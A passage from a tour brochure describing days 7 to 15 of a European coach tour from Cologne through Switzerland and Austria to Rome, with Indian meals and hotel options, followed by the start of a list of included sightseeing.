Day | 07 Visit the biggest Gothic Cathedral in Europe – the Cologne Cathedral. Enjoy a romantic cruise on the River Rhine. Next, visit Heidelberg Alstadt – with its old time appeal. After a Continental buffet breakfast, check out and proceed to Cologne. Visit the impressive Cologne Cathedral, a fine example of amazing Gothic architecture. This afternoon, Indian lunch will be provided. Later we proceed to board your scenic cruise on the River Rhine. Cruising down the Rhine, you will pass steep slopes covered with vineyards. The River Rhine is one of Europe’s major navigable rivers. Later, board your coach again and drive to Heidelberg, situated on the banks of the river Neckar. On arrival stroll down Alstadt to get a feel of real European experience of the past. This evening, enjoy a sumptuous Indian dinner at a restaurant, before you drive to your hotel. Overnight at Hotel Holiday Inn Express / Park Inn / Mercure or similar in Frankfurt / Heppenheim / Mannheim.

Day | 08 On to Hofgutsternen – heart of the Black Forest. View the spectacular Rhine Falls in Schaffhausen.  After a Continental buffet breakfast at the hotel, check out, sit back and relax in your coach as we drive to Hofgutsternen. This is the heart of the Black Forest, surrounded by dark fir forests, fairy tale woods and flowering meadows. Here is the home of the world-famous cuckoo clock. Get invited for a free demonstration and buy one for your home – a prized possession. Today, the choice is yours to enjoy an Indian lunch or local meal with an authentic black forest pastry. Next, proceed to Switzerland, enroute visit the Rhine Falls – the largest waterfalls in Europe. This evening, enjoy a hot Indian dinner at a restaurant.  Overnight at Hotel Novotel / Park Inn or similar in Zurich OR Hotel Movenpick / Arcade / Angels Lodge / Victoria or similar in Central Switzerland.

Day | 09 Day is at leisure OR you have a chance to join us on an all inclusive Alpine excursion tour to the wonderful world of Jungfraujoch – the top of Europe – at 3,454 metres. Also visit Interlaken. Get set for a memorable experience. This morning, after a Continental buffet breakfast, the day is at leisure OR you can join us on an adventurous ride to visit Jungfraujoch – The Top of Europe, for a memorable encounter with snow and ice – a genuine ‘high-point’ of your tour! Sit back in your coach as we proceed to the beautiful town of ‘Lauterbrunnen’, where the excitement continues. You will be amazed at the scenic splendour that you see from aboard the ‘cogwheel’ train, which takes you to a height of 3,454 metres to reach Jungfraujoch! This is a trip to another world – a wonderful world of eternal ice and snow. Experience the magic of the mountains and visit the Ice Palace on top of the longest glacier in the Alps. A visit to the Sphinx is also included. Later, we visit Interlaken, a charming city nestled between two lakes and surrounded by the splendid Bernese Oberland Mountains, where you will enjoy a delicious Indian meal for lunch.  Treasure these wonderful moments as you drive back to your hotel. This evening enjoy a sumptuous Indian dinner. Overnight at Hotel Movenpick / Arcade / Angels Lodge / Victoria or similar in Central Switzerland.

Day | 10 Today, get set for a day full of fun and excitement as we take you to visit Mt. Titlis with its beautiful scenery and an adventurous ride up the snow-clad Swiss Alps in Rotair – the world’s first revolving cablecar. Enjoy a scenic cruise on lake Lucerne. After a Continental buffet breakfast at your hotel, we take you on one of the most memorable experiences of your Europe tour – visiting Mt. Titlis and Lucerne. Adventure awaits you in a sensational cable-car ride up to Mt. Titlis. Marvel at the world’s first revolving cable-car ride, a truly once-in-a lifetime experience. Remain spellbound as you ascend the snow-clad mountains. Experience the snow and ice on top of Mt. Titlis. At 3,020 metres a breathtaking panorama unfolds. Later we proceed to scenic Lucerne. Enjoy a delicious Indian lunch on arrival. Next, you will visit the Lion Monument and the Kapell Brucke (wooden bridge). Here you will also have some free time to shop for famous Swiss watches, knives and chocolates. Enjoy a scenic cruise on the serene waters of Lake Lucerne. Tonight, after a delicious Indian dinner return back to your hotel. Overnight at Hotel Movenpick / Arcade / Angels Lodge / Victoria or similar in Central Switzerland.

5

Day | 11 Onto Innsbruck, in picturesque Austria at the crossroads of Europe. Visit Swarovski Museum – the headquarters of crystals.  This morning, after a Continental buffet breakfast, check out and drive through the Arlberg Tunnel in picturesque Austria. After a hot Indian meal for lunch proceed to Wattens, where you will visit the world-famous Swarovski Crystal Museum. Enjoy a fascinating experience in to the ‘world of crystals’. An experience that leaves you amazed at the dazzling glitter as you walk through this museum. A great opportunity to buy a souvenir for your family. Later arrive in Innsbruck and proceed for an orientation tour of this beautiful city. See the Golden Roof and the Maria Theresien Strasse. Stroll on cobblestone pathways and get a feel of old-world European charm. The splendid scenes of the Alps in the background are a perfect picture-postcard setting. Tonight enjoy an Indian or local dinner especially prepared for you. Overnight at Hotel Kronen / Olympia / Alpine Park or similar in Seefeld/ Innsbruck.

Day | 12 Romantic Venice – crossed by canals, beautiful monuments, the city that inspires poetry and passion. World famous gondola ride included too! After a Continental buffet breakfast at the hotel, check out and drive towards Italy. Indian lunch will be provided. Proceed to the pier and board a private boat which will take you to the heart of the traditional city of Venice – The      St. Mark’s Square. This astonishingly wonderful lagoon city is a special delight to visitors. Sail over the Guidecca Canal, as you catch a glimpse of the serene waters of the Adriatic Sea. On arrival, admire The St. Mark’s square with the Basilica, Doge’s Palace, Campanile and Bridge of Sighs. You will be taken on an unforgettable gondola ride through the smaller canals for a true picture of this lagoon city. Also visit the Murano Glass showroom. This evening, after a hot delicious Indian dinner check into your hotel. Overnight at Hotel  Unaway / Petrarca / Europa or similar in Occhiobello / Rovigo or similar.

Day | 13 Guided city tour of Florence – the cradle of the Renaissance, former home of the Medicis. Pisa – Marvel at one of the wonders of the world – The Leaning Tower of Pisa. After a Continental buffet breakfast at your hotel, check out and proceed to Florence. Meet your English-speaking local guide for a city tour of Florence, including the Duomo, the Campanile, the Baptistry with its Gates to Paradise, Piazza Della Signoria – an open air museum of sculptures, the famous Ponte Vecchio bridge across the river Arno and Santa Croce where Michelangelo, Galileo and many famous Italian personalities are buried. Drive to Piazzale Michelangelo, a square on top of a hill with its replica of the impressive statue of David and also get a bird’s eye view of the city of Florence. After a delicious Indian lunch drive to Pisa to visit the Square of Miracles. Remain spellbound as you approach this precariously leaning tower. Photograph your family with the Leaning Tower in the backdrop. You also have some free time to shop. After a sumptuous hot Indian dinner at a restaurant check into your hotel.  Overnight at Hotel Planet / Idea or similar in Arezzo / Pisa or similar.

Day | 14 Visit Rome on a Guided city tour. Visit the world’s smallest country – the Vatican City which includes the Vatican Museum, the Sistine Chapel and the magnificent St. Peter’s Basilica. After a Continental buffet breakfast this morning, check out of your hotel, board your coach and proceed to Rome. Today, you have a choice to enjoy an Indian or local meal for lunch at a restaurant in Rome. Next proceed for a city tour of Rome with an expert English-speaking guide. Visit the Vatican City – the smallest country in the world (shorts or sleeveless vests not allowed). First stop at the Vatican Museum, with a visit to the world -famous Sistine Chapel – a pure source of inspiration for art lovers and tourists alike, specially included on your tour. This will be followed by a visit to the holy Basilica of St. Peter’s – the incomparable home of architectural and artistic masterpieces by Michelangelo and Bernini, which will leave you awestruck. Next, see the imposing Colosseum, a vast amphitheatre, known for its gladiator fights. Also see the Victor Emmanuel Monument, the Roman Forum, Trevi Fountain and many

6

more sights of this historic city. Tonight, we have arranged a delicious Indian dinner at a restaurant. Later, check into your hotel and relax. Overnight at Hotel Idea / Best Western / Antonella or similar in Rome.

Day | 15 Fly back home. After a continental buffet/boxed breakfast, we check out and proceed to the airport for your flight back home. Arrive home with pleasant memories of your European tour, which we are sure you will treasure for a lifetime. Do spare a few minutes to fill in the feedback form and hand it to your Tour Manager. Your valued suggestions will be most appreciated

WHAT YOUR TOUR PRICE INCLUDES:  SIGHTSEEING AND EXCURSIONS

UNITED KINGDOM • London : Guided city tour.    Entrance to Madame Tussaud’s Wax Museum.    Ride on the London Eye.    Swaminarayan Temple.    Guided tour of the world famous Wimbledon Lawns and Tennis  museum. FRANCE • Paris  : Guided city tour.    Visit to the 3rd level of the Eiffel Tower. Fun-filled trip to Euro Disney OR guided tour of Versailles Palace and a visit to the famous        Louvre museum    Enjoy a romantic cruise in Paris. BELGIUM • Brussels : A visit to the Grand Place and Mannekin Pis Statue with a photostop at the Atomium.

NETHERLANDS • Amsterdam : Amsterdam Canal cruise  • The Hague : Madurodam  • Keukenhof : Till 20th May visit Keukenhof – Largest Spring Garden in the world • Volendam : From 21st May visit Volendam – Traditional Dutch Fishing Village    Visit a cheese farm and a wooden shoe factory. GERMANY • Cologne : Historical Cologne Cathedral.  • Heidelberg : A stroll down the Alstadt. • Rhineland : Romantic Rhine cruise. • Hofgutsternen: Heart of Black Forest.  SWITZERLAND    Visit Mt.Titlis in the world’s first revolving cable car.    Orientation tour of Lucerne.    Cruise on Lake Lucerne. • Schaffhausen : Magnificent Rhine Falls. AUSTRIA • Wattens : Visit the Swarovski Crystal Headquarters and Museum. • Innsbruck : Maria Theresien Strasse and The Golden Roof.

7

ITALY • Venice : Visit the St. Mark’s Square on a private boat.     Romantic gondola ride included.    Visit Murano Glass showroom. • Florence : Guided city tour. • Pisa  : Leaning Tower of Pisa. • Rome  : Guided city tour. VATICAN • Vatican City : Entrance to the Vatican Museum with Sistine Chape